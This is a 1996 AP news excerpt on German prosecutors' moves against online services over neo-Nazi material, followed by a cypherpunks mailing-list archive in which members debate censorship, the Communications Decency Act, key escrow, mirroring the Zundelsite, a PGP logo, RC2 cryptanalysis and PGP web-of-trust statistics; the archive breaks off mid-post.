      BERLIN (AP) -- Prosecutors trying to keep Germans from reading
neo-Nazi propaganda on the Internet have notified America Online Inc.
that it may be charged with inciting racial hatred.

      Last week, prosecutors served similar notice to another
U.S.-based computer on-line service, CompuServe Inc. of Columbus,
Ohio, and T-Online, a division of the German phone company.

[...publishing neo-Nazi lit is illegal...]

      Prosecutors in Mannheim are considering bringing incitement charges
against the three Internet providers in Germany for allowing access to
material posted on the Internet by Ernst Zuendel, a German neo-Nazi living
in Toronto.

[...easy to create a web site...]

      T-Online, Germany's largest Internet access provider, responded
to the prosecutors' investigations by blocking its 1 million
subscribers from gaining access to the computer in California where
Zuendel had posted his tracts.

      Computer users accused T-Online of overreacting because the
block also prevented them from reaching more than 1,500 other sites on
that part of the network.

      CompuServe, with 4 million subscribers worldwide, including
220,000 in Germany, has not blocked the California server but said it
was working with the prosecutors to find a solution.

      America Online spokesman Ingo Reese in Hamburg said his company
also was happy to work with the prosecutors. The company is ``totally
opposed'' to illegal propaganda, he said, but argued that commercial
on-line companies have as much control over materials posted on the
Internet as telephone companies have over their customers'
conversations.

      America Online, based in Vienna, Va., only began operating in
Germany in December in a joint venture with a German company,
Bertelsmann AG. The joint venture has 40,000 subscribers in Germany;
America Online has 4.5 million customers worldwide.

[...]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jordan Hayes <jordan@Thinkbank.COM>
Date: Sat, 3 Feb 1996 12:27:21 +0800
To: cypherpunks@toad.com
Subject: Re: Imminent Death of Usenet Predicted
Message-ID: <199602030401.UAA19434@Thinkbank.COM>
MIME-Version: 1.0
Content-Type: text/plain


	From tcmay@got.net Fri Feb  2 19:10:21 1996

	I'm not despairing ...

It seems to me that all the things you pointed out are just symptoms
of the Internet growing up.  You mentioned on the one hand that
you don't like the trend that you see culminating in having all
USENET posts be signed, but on the other hand that you'd like to
see a 'sealed package' approach to your packets.

The problem is clear: USENET *isn't* 'sealed packages' -- it's
practically an outdoor billboard.  And I think it's logical to
expect some concensus-based rules for behavior there.  This whole
uproar about 'porno on the net' has to do with how children can
'stumble' upon it, as opposed to, say, renting it from Blockbuster[*].

I'm a little more upbeat than Tim, I guess.  I see the trend toward
'socialization' on the 'public' part of the Internet as ultimately
just fine, and the trend toward finding private means ('sealed
packages') to transmit 'private' goods continuing.  Soon I hope
that there will be as much chance of children 'stumbling upon'
X-rated JPEGs as they can today image satellite-delivered porno in
their heads without a dish.

I think the trend will continue so that people will eventually feel
that their e-mail is about as safe from 'the public' as a phone
call is.  Absolute privacy will be resisted from the top because
being 'in power' means always having a final veto; but what is the
real risk of this?

And don't forget: if you have privacy, you don't need anonymity.
Swiss banks provide the ultimate example.

/jordan

[*] I think community standards are important.  Whether it's speed
bumps on side streets or calls for silence in a jazz club, the
participants in a group should get to decide what is acceptable
behavior within their group.  That being said, I also believe it
is one of the few roles that a national government to provide is
guidance about a small number of issues (so before you hit that
'R' key, I don't believe that small towns can assert racism in
their town charter ...).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 3 Feb 1996 11:23:23 +0800
To: cypherpunks@toad.com
Subject: Imminent Death of Usenet Predicted
Message-ID: <ad37f8191d0210040671@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I can't say that I've always wanted to use this oft-joked about title, but
for the first time since I got on some form of the Net in 1973, I think
there's some truth to it.

(It's not hopeless. In fact, the stuff we talk about, use, work on, etc.,
is the best hope.)

Several pieces of news are coming at the same time:

* the Communications Decency Act, as part of the Telecom Act, was passed by
Congress yesterday. Clinton is expected to sign it into law early next
week. It includes language of great significance for users, for ISPs, and
perhaps for remailers. When it takes effect--some number of days after
Clinton signs it into law--it could almost immediately have a chilling
effect on many newsgroups, on Web accesses, etc. Though civil liberties
groups are expected to challenge it in court, and may ultimately win, it
could be a long and expensive fight for some ISP who "lets" a 17-year-old
access indecent material (or lets abortion articles in, or lets various
other banned things in).

* Other countries are gaining steam in restricting, or trying to restrict,
what happens on the Net, especially what enters. Germany is the most
oft-discussed, with actions underway against Compuserve, American Online,
and possibly other ISPs with a German presence. And the Deutsche Telekom
access block of American sites. France is also contemplating various
actions. Even the "liberal" countries have things brewing, according to
news items appearing recently. (Look at the list of countries represented
by senior law enforcement officials at the Key Escrow meetings in Sept.
'94, for example. I don't expect most of these countries to have an active
public debate about crypto restrictions, for various obvious reasons. I do
expect them to accept with alacrity the "international treaties" when they
are offered.)

* And don't forget that there is still a campaign to control encryption and
to adopt a global regimen for "key escrow." The various international
meetings, the Washington meetings, and the noises coming out of foreign
capitals strongly suggest a comprehensive scheme--as yet unannounced--to
mandate the escrowing of keys with the local authorities. (To be sure,
there are many, many problems, and many avenues for attack, but this
doesn't mean such an international scheme won't be tried...look to the U.S.
lead in controlling drug traffic over the past 60 years.)

* The Wiretap Bill still mandates that digital switches be made digitally
wire-tappable. (Lots of technical details, and lots of debate about how
much of the $500 million mentioned will actually be budgeted, provided,
etc.) FBI Director Louis Freeh is still pushing this as critically
important. This is part of the larger mosaic.

* Various trial balloons about key authentication agencies, about having
the government issue keys and even handle e-mail (the Postal Service has
been pushing for this for a long time). Some of the "centralized" schemes
for signature authorities appear to fit in nicely with a
government-mandated certificate hierarchy. There are various scenarios for
how a certificate hierarchy could be mandated, ranging from outlawing of
"anarchic" variants (unlikely, at first) to the court system refusing to
help enforce contracts signed in a non-compliant manner (pretty likely, in
my opinion).

* Universities are *not* becoming more tolerant and diverse, more acceptant
of extreme speech. In fact, more and more of them are adopting "speech
codes," especially for the Internet. Sometimes called "stalking" laws,
sometimes "respect" laws, they serve to stifle what is noniolently,
noncoervively said by some students to others. Even private jokes, as at
Cornell, are treated as crimes (the "voluntary" community service the four
Cornell students agreed to). And "political" material is ordered off
university Web sites (the UMass case of Lewis McCarthy, which just unfolded
today).

*Universities, corporations, and even ISPs are explicitly adopting policies
that allow them to inspect e-mail at will. (If the arrangement is made in
advance, it may not violate the ECPA to do this...and I'm not saying there
aren't some good reasons why these entities would want the right to inspect
e-mail (their liability being a good example), just noting the growing
situation. Absent any sort of "common carrier," we may be approaching an
age where the relay layers most users must use have explicit policies
allowing monitoring and even banning unapproved/unescrowed encryption (I've
seen the policies of at least one ISP that state this). (Alice and Bob can
still presumably dial each other up directly over the phone lines and do a
UUCP-style transfer, but using intermediary ISPs may not allow them to use
the crypto of their choice...again, the ISPs, universities, corporations,
etc., may be held liable for misdeeds done over their systems, so this is
why they would want to control the content or have some way to monitor
communications.)

* The Four Horsemen of the Infocalypse. Increasing media reports of child
porn on the Net, of "digital stalkers" on campuses, of children finding
bomb instructions, of nuclear terrorists using Alta Vista to design their
bombs.... Even the media lionization of Shimomura, who dismisses concerns
about privacy as the ravings of paranoid hackers and libertarians, adds to
this public view. Shorter, more sensationalistic, articles are appearing
daily. (I don't believe the reporters, notably Markoff, Levy, etc., are "in
on" some kind of conspiracy, just noting that the media hype about the Net,
and hackers, and the dangers, are adding up to a growing sense that "the
government has to something!").

* "Anonymity" in general is under attack. Calls for "responsibility." "What
have you got to hide?" is the standard refrain. If the rumors of a kind of
"Internet Drivers License" are correct, all posts could be required to be
signed by the orginator. Forwarders would be held responsible for checking
signatures, or, at least, be held liable for misdeeds. They would not be
treated as we treat the carriers of sealed packages, for example. (I can
think of many counter-arguments, including the usual one about a forwarder
not knowing the contents of what he was forwarding, not being able to tell
if a file was noise, data, compressed data, or an encrypted packet...while
I find this persuasive, it may take years of expensive court cases to
establish this, and still might go against this interpretation.)

* Corporations are having their secrets stolen, and are demanding that
something be done. (Expect more of these calls to increase as more cases
like the RC2 case arise...without supporting RSA in their anger, I can see
why remailers scare the hell out of them,)

* Groups as disparate as the Church of Scientology and the Simon Wiesenthal
Center are screaming to have the Net regulated. What major groups will be
next? The Catholic Church? The Junior League? As more groups "threatened"
by the anarchic, free speech of the Net decide to cast their lot in with
the government (with hopes that if they scratch the government's back,
it'll return the favor, or at least help control the marauders), the
constituency for clamping down on the Net will grow.

* And the tax authorities, the IRS, FinCEN, etc., are well-known to be
trying to figure out how to get their cut, how to control the spread of
untaxed transactions, and how to make sure that Chaumian untraceable
digital cash is never fully deployed. You can bet that they would love to
have Visa or Mastercard or one of the "little" systems that allows full
traceability be adopted, maybe even mandated. This would in one fell swoop
fix several problems for them.

Without getting into paranoia about Clinton, Black Helicopters, U.N. troops
in American cities, the militia movement, Fostergate, etc., it looks to me
like a coordinated move to try to regain "control" of the transnational
Internet anarchy is getting started in earnest.

I said it is not hopeless. Indeed, the powerful technologies of encryption,
digital mixes, and other such tools will make a clamp-down very hard, maybe
ultimately impossible. This is my hope.

But in the meantime, a lot of hard work. And a lot of obvious targets--such
as people who put things on their Web pages, ISPs who let minors on their
systems, those who cause abortion information to be brought in from outside
the U.S., etc.--will be prosecuted, given huge fines to send a message to
others, and maybe even imprisoned. International treaties will be signed,
giving these laws the force of treaty. The New World Order,
cyberspace-style.

I'm not despairing. I just think a lot of work lies ahead of us. The crypto
anarchy future is not going to happen if governments have anything to say
about it. Therein lies the challenge.

--Tim May



Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Sat, 3 Feb 1996 10:20:29 +0800
To: Steven L Baur <steve@miranova.com>
Subject: Free filtered list -> Re: noise levels
In-Reply-To: <m2lomnn7y8.fsf@miranova.com>
Message-ID: <Pine.SUN.3.91.960202201029.28463D-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain


On 31 Jan 1996, Steven L Baur wrote:

You know folks, I do run a free filtered cypherpunks list.  there's no 
need for ratings.  I filter, you read. :)

If you want to subscribe send a message with the subject "FCPUNX 
SUBSCRIBE" or "FCPUNX HELP"


==========================================================================
 + ^ + |  Ray Arachelian |Emptiness is loneliness, and loneliness|  _ |>
  \|/  |sunder@dorsai.org|is cleanliness  and cleanliness is god-|  \ |
<--+-->|                 |liness and god is empty,  just like me,|   \|
  /|\  |    Just Say     |intoxicated  with the maddness,  I'm in|   <|\
 + v + | "No" to the NSA!|love with my sadness.   (Pumpkins/Zero)|   <| n
===================http://www.dorsai.org/~sunder/=========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 3 Feb 1996 12:42:26 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Futplex makes the news!
In-Reply-To: <ad3810aa1e021004cc23@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.960202193609.20243c-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 2 Feb 1996, Timothy C. May wrote:

> At 2:28 AM 2/3/96, Mike Duvos wrote:
> >On 2 Feb 1996 19:02:29 -0500, you wrote:
> >
> >Before poo-pooing Tim, declaring victory, and returning home, it
> >should be noted that German prosecutors today added AOL to the list of
> >entities they wish to charge with "inciting hatred."
> >...
> >Time will tell whether we have won this war, or have simply
> >encountered a lull after the first onslought by the enemy.
> 
> Meaning no disrespect to any of my colleagues here, but is there now some
> sense that "we won"?
> 
> I don't see it this way. And the Germans don't seem to think they lost.

That's what they thought in 1945, too. I'd really hate to have to nuke
them from orbit. I maintain (I hope a little more coherently now) that
widely publicized subversion is far more effective than a frontal assault.
Who holds up the nuking of Hiroshima and Nagasaki as great victories
against tyranny? 
 
> Maybe I'm not seeing the Boston-area papers, and their spin on things, but
> it doesn't seem to me that an anti-censorship interpretation is getting a
> lot of press. What I am sensing is just the opposite, that a bunch of
> babykilling Nazis bent on taking over the Internet just had their main
> Propaganda Center at UMass shut down by the forces of light. This is the
> spin on the story I'm sensing.

I think this sense is wrong.

Yesterday's "Modem Driver" column in the San Jose Mercury News was poorly 
researched, but had the right spin. It mentions that the operator of 
webcom.com is the grandson of a Holocaust victim, so he gets the Mom & 
Apple Pie vote.

 http://www.sjmercury.com/living/daveplot/modem084.htm

Front page of the Stanford Daily, which generated calls from the San Jose 
Merc and the Chronicle of Higher Edication, which are likely to get the 
story right:

 http://www-Daily.stanford.edu/2-2-96/NEWS/index.html

[No, I am *not* happy to get all the credit there]

AP story in Boston Globe (long and ludicrous on-line URL, and OK, so this 
is not the greatest story, but I think it's somewhat positive):

 http://www.boston.com/globe/ap/cgi-bin/retrieve?%2Fglobe%2Fapwir%2F033%2Freg%2Fag052102

Web Review (good, even though he totally misrepresented what I'd said 
without even bothering to try to reach me):

 http://www.gnn.com/gnn/wr/96/02/01/news/ndn/zundel.html
 http://www.gnn.com/gnn/wr/current/news/ndn/telcom.html

The News & Observer (also never bothered to contact me before stating 
what I believed):

 http://www2.nando.net/newsroom/ntn/info/020296/info2_20579.html

> (Hate to say it, but the nuances of free speech are lost on most people. To
> most of them, putting Holocaust denial information on a site is ipso facto
> proof of genocidal racism.

I think it is, if (and only if) you agree with it.

> I wouldn't be surprised to see the various
> groups at UMass foaming at the mouth next week in the campus newspaper to
> get the "notorious racist" Lewis McCarthy sanctioned or thrown out.

I certainly would.

> Here's to hoping Rich's site remains up.

I've shut off access and challenged Zundel to get his many friends to run
their own damn mirrors. They could, you know -- at least one of them has a
T1. But I will put the files back (on c2.org and/or netcom and/or AOL
accounts, because it's just not ethical for me to involve Stanford in
this) if Deutsche Telekom continues to block access to webcom.com after,
say, next Wednesday. 

If they're not back up by, say Monday, I'll post an ultimatum to the 
above effect.

Netcom has hosted several notorious hate groups for years. There's no way 
in hell they'd buckle, and they're big enough to matter. Probably bigger 
than Stanford and CMU combined, though without quite the same symbolic 
power.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRLgRI3DXUbM57SdAQHDDwP/XI0VJKQ9mELfCFeo/HLxqfanO4Xw1xcu
bXPiao91PCSKYJIfOM0Xku90bQB2rdVgbFLqX1fxbUu3cHi8pmq9ZRtV8rWgLcvR
WpMnmslOZjTmoIjUL5llRmQbPhUWhYithCQuP1EXsoZ/mo8ngQyW0AfGPvYWyGpe
dK3Zn0YohvQ=
=2k0/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 3 Feb 1996 10:34:28 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Futplex makes the news!
In-Reply-To: <ad37cb251902100476f7@[205.199.118.202]>
Message-ID: <wl4fd8200YUtEdKuQV@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 2-Feb-96 Re: Futplex makes the news!
by Timothy C. May@got.net 
> If UMass has yielded, the prominently mentioned CMU and Stanford sites may
> be prompted to exactly the same thing. This will "prove" to the Germans
> that they did the right thing, and be a blow in _favor_ of suppression of
> speech.
>  
> I hope some other sites have the mirrored material and are not reeds in the
> wind as at least one university is.

If we're talking about Nazis, UMass is the place to look for the PC
breed of 'em. Check out http://joc.mit.edu/roundup.html for info on
their recent PC speech code censor attempts at UMass Amherst.

I've decided to take the materials off my web pages -- but with no
pressure from, and in fact no communication at all with CMU
administrators. I've had nothing but support from the School of Computer
Science folks at Carnegie Mellon. A CMU SCS faculty member even offered
to host the pages if the administration got their panties in a snit.

This after there was a front page above-the-fold article in today's
Pittsburgh Tribune Review: "CMU in middle of Internet flap" It talked
about the Simon Wiesenthal Center's efforts to, um, educate university
administrators:

    The Simon Wiesenthal Center, the world's leading anti-Nazi organization,
was fuming however -- faxing indignant messages to the presidents of CMU,
Stanford, the Massachusetts Institute of Technology, and University of
Pennsylvania...

    Mark Weitzman, the director of the Wiesenthal Center's Task Force Against
Hate, said he had heard nothing by late yesterday afternoon from CMU
President Robert Mehrabian, whom he had urged by fax Wednesday "to address
this issue as quickly as possible."...

    Linda Hurwitz, director of the Holocaust Center of Pittsburgh, criticized
the postings, saying while she didn't approve of censorship in general, some
lies were so harmful that they were tantamount to yelling "fire" in a crowded
theater.

I don't often congratulate Carnegie Mellon for a job well done, but this
is one of those occasions. (Though I'm not sure how the administration
would have reacted if the Zundelstumphen was in my Andrew account
instead of my SCS AFS directory...)

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 3 Feb 1996 12:55:07 +0800
To: John Pettitt <cypherpunks@toad.com
Subject: Re: RSA disappears :-)
Message-ID: <2.2.32.19960203042904.00928b40@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:28 PM 2/2/96 -0800, John Pettitt wrote:
>rsa.com dissapeard from the net!  The only valid nameserver for rsa.com is
>rsa.com and since it's net connection is down anybody trying to talk to
>www.rsa.com or send mail to rsa is getting host not found errors.

Maybe it was because Tim May broke their cover.

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
         Is the operating system half NT or half full?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 3 Feb 1996 11:38:23 +0800
To: cypherpunks@toad.com
Subject: Re: Futplex makes the news!
Message-ID: <ad3810aa1e021004cc23@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:28 AM 2/3/96, Mike Duvos wrote:
>On 2 Feb 1996 19:02:29 -0500, you wrote:
>
>>I think the whole endeavor was a resounding success, and I wish I had been
>>on the ball enough to participate in it.
>
>[deletia]
>
>>The important thing is that Rich, Declan, Futplex, and anyone else
>>participating showed the world that censorship on the internet, if not
>>impossible, is at least a good deal more dificult then people thought.
>
>Before poo-pooing Tim, declaring victory, and returning home, it
>should be noted that German prosecutors today added AOL to the list of
>entities they wish to charge with "inciting hatred."
>
>UMASS will of course test the political waters before taking any
>action, but we may yet see the gonads of Futplex hanging from one of
>the upper floors of the Graduate Research Center.  :)
>
>Time will tell whether we have won this war, or have simply
>encountered a lull after the first onslought by the enemy.

Meaning no disrespect to any of my colleagues here, but is there now some
sense that "we won"?

I don't see it this way. And the Germans don't seem to think they lost.

Let's look at where this issue is. The UMass admins yanked the Zundelsite
info, Declan has voluntarily withdrawn his ZS info, Germany is accelerating
its threats against CS, AOL, etc., and of course the Communications Decency
Act is about to be signed into law.

Maybe I'm not seeing the Boston-area papers, and their spin on things, but
it doesn't seem to me that an anti-censorship interpretation is getting a
lot of press. What I am sensing is just the opposite, that a bunch of
babykilling Nazis bent on taking over the Internet just had their main
Propaganda Center at UMass shut down by the forces of light. This is the
spin on the story I'm sensing.

(Hate to say it, but the nuances of free speech are lost on most people. To
most of them, putting Holocaust denial information on a site is ipso facto
proof of genocidal racism. I wouldn't be surprised to see the various
groups at UMass foaming at the mouth next week in the campus newspaper to
get the "notorious racist" Lewis McCarthy sanctioned or thrown out.
University administrators  will try to cool things off, but will keep
feeling the pressures from various "aggreived" groups until something just
has to be done. I've seen this many times at Stanford, UC Santa Cruz,
Berkeley, and elsewhere.)

Here's to hoping Rich's site remains up.

--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Pugh <ampugh@mci.newscorp.com>
Date: Sat, 3 Feb 1996 13:05:27 +0800
To: cypherpunks@toad.com
Subject: Re: PGP "official" logo?
Message-ID: <199602030147.UAA29244@camus.delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


=snip=
>Why is an icon or logo preferable to "Begin PGP signed..."? The little
>rose, or chevrons, or escutcheons, or whatever, then have to be explained
>to people. "PGP" is actually its own best logo.
>
>(There is also the important point that most uses of PGP are in
>primarily-ASCII settings, in e-mail. Yes, I know that MIME and whatnot can
>support graphics, but such uses are rare. Look at this mailing list, and
>Usenet, for examples of how most messages are composed. I routinely delete
>all messages that have "attachments converted" to them, and others have
>told me they do the same thing.)

i agree with mr. may. graphics are misplaced in email generally. 
it takes long enough to download my mail without the additional
load of cute graphics. i can't image many graphics at all that 
would be much smaller than the biggest sig files.

otoh, it _would_ be useful imo to have a pretty much 'standard' 
graphic to put on web pages similar to the 'netscape' buttons 
you see everywhere. they might do nothing but link to one of the 
cypherpunks home pages, but the more people see them, the more 
aware people will hopefully become. perhaps it will pique some 
folks curiosity. actually, i like rsa's logo, but it is obviously 
taken. 

that said, i've seen a few passes on this list of discussion of a
graphic logo. the archives would be a good place to look for a fairly
massive volume of posts on it.  if anyone has a good idea, put it on a 
page and post the pointer.



amp






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Sat, 3 Feb 1996 05:40:57 +0800
To: cypherpunks@toad.com
Subject: Re: RC2 technical questions
Message-ID: <199602022058.PAA21068@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 02 Feb 96 10:02:37 PST, "baldwin@RSA.COM" wrote:

>        In a shameless attempt to move the discussion of RC2 into
>a more technical arena, here are some interesting questions to
>explore about RC2.
>                --Bob

Odd. You're from RSA.COM... It would seem that you're better able to
find these things out than the rest of us.

Make that Alleged RC2, BTW. ;)

I'm rather curious about implementing known plaintext attacks.  The
reliance on addition and anding doesn't make me feel too confident.

For example, the ciphertext produced by the input of all zeros
(plaintext) is basically the added/anded (with rolls) skey bytes.

With a bit of probabilistic analysis one could work at determining the
skey[] bytes.  Weaknesses in the key expansion may help this
further...

Rob.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Edgar Swank <edgar@Garg.Campbell.CA.US>
Date: Sat, 3 Feb 1996 14:19:45 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: OFFSHORE RESOURCES
Message-ID: <7VHPiD2w165w@Garg.Campbell.CA.US>
MIME-Version: 1.0
Content-Type: text/plain


Another URL for offshore investing, etc. is

  http://www.dnai.com/offshore/offshore.html

Edgar W. Swank   <edgar@Garg.Campbell.CA.US>

-- 
edgar@Garg.Campbell.CA.US (Edgar Swank)
The Land of Garg BBS -- +1 408 378-5108




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 3 Feb 1996 22:26:50 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: THIS IS NOT NUKEPUNKS Re: Sometimes ya just gotta nuke em
In-Reply-To: <ad382f4421021004fcae@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.960202212054.20243l-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


ROTFL

But this is not nukepunks...

and that wasn't my point. There is considerable debate about whether
dropping the bomb was right. The moral clarity of a Gandhi, MLK, or (to
add someone who actually killed people, I think) Thomas Paine is much more
useful when you're talking about winning hearts & minds. 

If you have a choice, don't nuke.

But yes, sometimes ya just gotta nuke em.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 3 Feb 1996 11:51:16 +0800
To: cypherpunks@toad.com
Subject: Re: Encryption and the 2nd Amendment (fwd)
Message-ID: <199602030328.VAA03766@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 2 Feb 1996 18:37:24 -0800
> From: tien@well.sf.ca.us (Lee Tien)
> Subject: Re: Encryption and the 2nd Amendment
> 
> I agree that a 2nd A. argument is legally worthless; so do Mike Godwin and
> other persons whose legal opinions are generally carefully considered.  
> 

I still believe this issue is a prime candidate for testing the 9th and
10th. There is nothing specific in the Constitution which allows the
government to control crypto technology (or any technology actualy) which is
contrary to the 10th. Per the 9th it should be left up to the states or the
people to decide. The current group of issues as mentioned in a post by Tim
May earlier today are all related by these amendments. The precedence of the
legislative and court bodies in this country ignoring these amendments may
be at an end.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Sat, 3 Feb 1996 11:20:16 +0800
To: cypherpunks@toad.com
Subject: Re: Lotus Notes
In-Reply-To: <199601310705.XAA09848@netcom6.netcom.com>
Message-ID: <199602030230.VAA06785@amsterdam.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Tim May had it exactly right in his post entitled "Silver Linings
> and Monkey Wrenches" (thanks Tim).  The only thing I can add is that
> forcing them to attack a 40 bit key is better than giving them the
> whole key thru some LEAF scheme ala Clipper.

Your point may be valid, but who is attacking a 40 bit key?  Is
cracking 40 out of 64 bits of a 64-bit RC4 key as hard as cracking a
40 bit key, or does knowing a significant portion of the key make the
search considerably easier than brute force?  I've never heard anyone
make an assertion either way, except that some people seem to assume a
the difficulties are the same.

Thanks,
David





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sat, 3 Feb 1996 11:37:59 +0800
To: Philip Zimmermann <prz@acm.org>
Subject: Re: PGP "official" logo?
Message-ID: <9602030250.AB01223@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Cc: CypherPunks

Philip Zimmermann <prz@acm.org>, replied to me:

>I'd like to see some suggested logos.  I am closing in on a design
>for a PGPfone logo.
>
>Phil

Well, I tend to believe that you are not reading Cypherpunks currently...

I got some reply that told me that, basically, the inherent anarchy of 
CPunks would make it impossible to hold a vote.  Some even questionned
the utility of a logo.  Some other said that many peoples use non-graphical
software.

While I think that a logo is a nice idea,  I never 
even considered designing one myself before somebody mentionned 
the idea, today on CPunks.

IMO, I think that a logo would appeal to non-techies.  The typical non-
techie attitude is to *ignore* anything he/she does not understand.  The 
proposed label "PGP signed" or similar would not have the effect a good
logo would on certain persons.

A logo could make PGP look "cool".  I am not prejudiced against trying to
attract peoples who would not look up by themselves, especially considering 
the actual condition of the net.

Refuting the usefullness of a logo would be an expression of the 
opinion that dumbness is uncurable.
MHO on it is that while dumbness will always exist, *specific individuals* 
could be educated.  This is especially true of the youngs. And beside, 
the masses never made anything change for the better... 

In this optic, and regarding the fact of the immense popularity of 
software that requires little computer knowledge, I think that a logo 
is not only appropriate but also necessary, if encryption issues are to 
be resolved in our favor.

Many techies, and many members of CPunks are of this type, scorn at the
"uneducated" public.  It is a great mistake they do.  Not because they
have have a duty to the public, but because in the "public", lives 
intelligent individual that, for a multitude of reasons, did not 
follow the same path as them.  They owe it to themselves, our of selfishness
to spread their vision of the world

Regards


JFA  B.Sc. Physics

P.S. Thanks for having written PGP.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Neal.McBurnett@att.com (Neal McBurnett)
Date: Sat, 3 Feb 1996 14:03:06 +0800
To: cypherpunks@toad.com
Subject: Analysis of PGP keyserver web of trust
Message-ID: <9602030545.AA06363@lever.dr.att.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I wrote a Java program to analyze the the PGP web of trust and I've
documented it on some web pages.  They include information on the
strongly connected components (the largest has 1291 keys in it), the
longest "shortest-path" (21 signatures long), the 'central trustee'
and 'central truster', the mean path length (6.4, by one definition), etc.

	http://bcn.boulder.co.us/~neal/pgpstat/

(For those who saw the earlier version, I've fixed some small bugs.)

There is a lot of useful information here for folks who want to
improve the connectivity of the public PGP web of trust.

Cheers,

Neal.McBurnett@att.com  503-331-5795  AT&T Bell Labs, Denver/Portland
WWW: http://bcn.boulder.co.us/~neal/Home.html  (with PGP key)

- -----------------------------------------------------------------------

                           PGP Keyserver Statistics
                                       
   This is an analysis of the web of trust among users of the leading
   technology in the world of secure email communications, Pretty Good
   Privacy (PGP). See the [1]PGP Frequently Asked Questions for more
   information on PGP itself and other related tools.
   
   There is a set of public key servers around the world which allow PGP
   users to register their keys and publicly sign each other's keys via
   [2]email and [3]WWW interfaces. This analysis is based on the public
   keyring obtained from
   [4]ftp://ftp.uit.no/pub/crypto/pgp/keys/pubring.pgp on _1 Jan 1996_.
   For comparative analysis, here is the [5]Jan 1 version (7,976,108
   bytes long). I could also provide a shorter and simpler file format
   which just lists which keyIDs signed which keyIDs. If there is
   interest, updates can be provided.
   
Overall Statistics


Public keys submitted ('pub'):          19124
Signatures ('sig'):                     28031
Total number of unique keys referenced: 21107
Revoked keys:                           839

Self-signed keyIDs:                     7300
Other unique keyID-signs-keyID pairs:   17908

   Note that less than half of the keys are signed by themselves. People
   should _always sign their own UserID_ on their own key! Otherwise,
   someone else can surreptitiously change the email address in order to
   encourage correspondents to send email to the wrong place.
   
   Only about 1/3 of the keys are signed by at least one another key, and
   only 1/6 have 2 signatures.
   
     To be a "good PGP-citizen", you should
     * Be very careful about signing keys. Have first-hand knowledge
       based on hard-to-forge communications that the key's fingerprint
       (pgp -kvc) in your keyring matches the user's real fingerprint.
     * Sign the keys of at least two other people
     * Get at least two signatures on your own key.
     * Extra credit: Sponsor a [6]key-signing party
       
Strongly-Connected Components

   A 'strongly-connected' set of keys is defined as a set in which every
   key leads to every other key via some chain of signatures (aka
